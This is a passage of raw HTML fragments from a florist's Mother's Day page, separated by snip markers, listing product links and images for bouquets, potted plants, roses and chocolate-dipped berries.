ils - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Orchid-41728?viewpos=22&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
http://products.proflowers.com/spabaskets/Lavender-Relaxation-Bath--Body-Gift-Basket-30010076?viewpos=23&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Lavender Relaxation Bath &amp; Body Spa Basket for Mom" border="0" /></a>
...[SNIP]...
ick="exitMVTFreeVase=false" href="http://products.proflowers.com/spabaskets/Lavender-Relaxation-Bath--Body-Gift-Basket-30010076?viewpos=23&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
nclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/20-Blue-Iris-1806?viewpos=24&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="20 Blue Iris" border="0" /></a>
...[SNIP]...
t="Details - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/20-Blue-Iris-1806?viewpos=24&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
e=false" href="http://products.proflowers.com/mothersday/Two-Dozen-Springtime-Carnations-2760?viewpos=25&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Dozen Carnations for Mom" border="0" /></a>
...[SNIP]...
border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/mothersday/Two-Dozen-Springtime-Carnations-2760?viewpos=25&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
nclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Purple-Petals-954?viewpos=26&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Purple Petals" border="0" /></a>
...[SNIP]...
t="Details - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Purple-Petals-954?viewpos=26&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
"exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Potted-Blue-Hydrangea-593?viewpos=27&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Blue Hydrangea" border="0" /></a>
...[SNIP]...
ils - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Potted-Blue-Hydrangea-593?viewpos=27&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/30-Purple-Tulips-41126?viewpos=28&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="30 Purple Tulips" border="0" /></a>
...[SNIP]...
tails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/30-Purple-Tulips-41126?viewpos=28&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
reeVase=false" href="http://products.proflowers.com/plants/Delightful-Daffodils-for-Mom-11404?viewpos=29&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Delightful Daffodils for Mom" border="0" /></a>
...[SNIP]...
Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Delightful-Daffodils-for-Mom-11404?viewpos=29&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ref="http://products.proflowers.com//Beary-Special-Mothers-Day-with-Godiva-Chocolate-30008666?viewpos=30&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Beary Special Mother&#39;s Day with Godiva.. Chocolate " border="0" /></a>
...[SNIP]...
onclick="exitMVTFreeVase=false" href="http://products.proflowers.com//Beary-Special-Mothers-Day-with-Godiva-Chocolate-30008666?viewpos=30&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Tradition-41215?viewpos=31&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mother&#39;s Day Tradition " border="0" /></a>
...[SNIP]...
- Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Tradition-41215?viewpos=31&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
eeVase=false" href="http://products.proflowers.com/roses/One-Dozen-Long-Stemmed-Red-Roses-503?viewpos=32&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="One Dozen Long Stemmed Red Roses" border="0" /></a>
...[SNIP]...
Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/roses/One-Dozen-Long-Stemmed-Red-Roses-503?viewpos=32&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ck="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Gerbera-Daisies-41216?viewpos=33&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Gerbera Daisies" border="0" /></a>
...[SNIP]...
etails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Gerbera-Daisies-41216?viewpos=33&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ck="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Spring-Awakenings-561?viewpos=34&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Spring Awakenings" border="0" /></a>
...[SNIP]...
etails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Spring-Awakenings-561?viewpos=34&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
href="http://products.proflowers.com/flowers/Full-Dozen-Hand-Picked-Swizzled-Berries-30005171?viewpos=35&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Full Dozen Hand Picked Swizzled Berries" border="0" /></a>
...[SNIP]...
" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Full-Dozen-Hand-Picked-Swizzled-Berries-30005171?viewpos=35&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
"exitMVTFreeVase=false" href="http://products.proflowers.com/pottedroses/Potted-Red-Roses-496?viewpos=36&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Red Roses" border="0" /></a>
...[SNIP]...
ils - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/pottedroses/Potted-Red-Roses-496?viewpos=36&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
click="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Queen-Bee-30050370?viewpos=37&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Queen Bee" border="0" /></a>
...[SNIP]...
="Details - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Queen-Bee-30050370?viewpos=37&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunshiny-Days-30008371?viewpos=38&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sunshiny Days" border="0" /></a>
...[SNIP]...
tails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunshiny-Days-30008371?viewpos=38&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/flowers/Potted-Double-Bloom-Azalea-43129?viewpos=39&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Double Bloom Azalea" border="0" /></a>
...[SNIP]...
y Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-Double-Bloom-Azalea-43129?viewpos=39&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Pink-Pearl-Roses-30010137?viewpos=40&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Pink Pearl Roses" border="0" /></a>
...[SNIP]...
ls - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Pink-Pearl-Roses-30010137?viewpos=40&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-All-the-Frills-43700?viewpos=41&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe All the Frills" border="0" /></a>
...[SNIP]...
- Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-All-the-Frills-43700?viewpos=41&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Garden-Bouquet-30050061?viewpos=42&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Garden Bouquet" border="0" /></a>
...[SNIP]...
ails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Garden-Bouquet-30050061?viewpos=42&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
eVase=false" href="http://products.proflowers.com/flowers/100-Blooms-of-Poms-for-Mom-30046508?viewpos=43&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="100 Blooms of Poms for Mom" border="0" /></a>
...[SNIP]...
ow" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/100-Blooms-of-Poms-for-Mom-30046508?viewpos=43&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/plants/Canterbury-Bells-Garden-9019?viewpos=44&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Canterbury Bells Garden" border="0" /></a>
...[SNIP]...
- Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Canterbury-Bells-Garden-9019?viewpos=44&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
p://products.proflowers.com/chocolatestrawberry/Chocolate-Strawberries-Mini-Cheesecakes-42415?viewpos=45&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Cheesecake Trio &amp; Full Half Dozen Giant Dipped Fancy Berries" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/chocolatestrawberry/Chocolate-Strawberries-Mini-Cheesecakes-42415?viewpos=45&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Mothers-Day-Lilies-41205?viewpos=46&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mother&#39;s Day Lilies" border="0" /></a>
...[SNIP]...
ails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Mothers-Day-Lilies-41205?viewpos=46&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Purely-Spectacular-41236?viewpos=47&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Mother&#39;s Day Tradition" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Purely-Spectacular-41236?viewpos=47&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-Yellow-Roses-43183?viewpos=48&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Yellow Rose" border="0" /></a>
...[SNIP]...
ls - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-Yellow-Roses-43183?viewpos=48&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
roducts.proflowers.com/roses/24-Rainbow-Mothers-Day-Roses-with-Pink-Vase--Chocolates-30002569?viewpos=49&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="24 Rainbow Mother&#39;s Day Roses with Pink Vase &amp; Chocolates" border="0" /></a>
...[SNIP]...
tMVTFreeVase=false" href="http://products.proflowers.com/roses/24-Rainbow-Mothers-Day-Roses-with-Pink-Vase--Chocolates-30002569?viewpos=49&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
"http://products.proflowers.com/chocolatestrawberry/12-Mothers-Day-Gift-Strawberries-30008960?viewpos=50&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Full Dozen Giant Dipped Mother&#39;s Day Berries " border="0" /></a>
...[SNIP]...
lick="exitMVTFreeVase=false" href="http://products.proflowers.com/chocolatestrawberry/12-Mothers-Day-Gift-Strawberries-30008960?viewpos=50&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Two-Days-for-Her-30002739?viewpos=51&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Days for Her" border="0" /></a>
...[SNIP]...
ls - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Two-Days-for-Her-30002739?viewpos=51&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ck="exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/30-Tulips-for-Mom-3669?viewpos=52&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="30 Tulips for Mom" border="0" /></a>
...[SNIP]...
etails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/30-Tulips-for-Mom-3669?viewpos=52&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
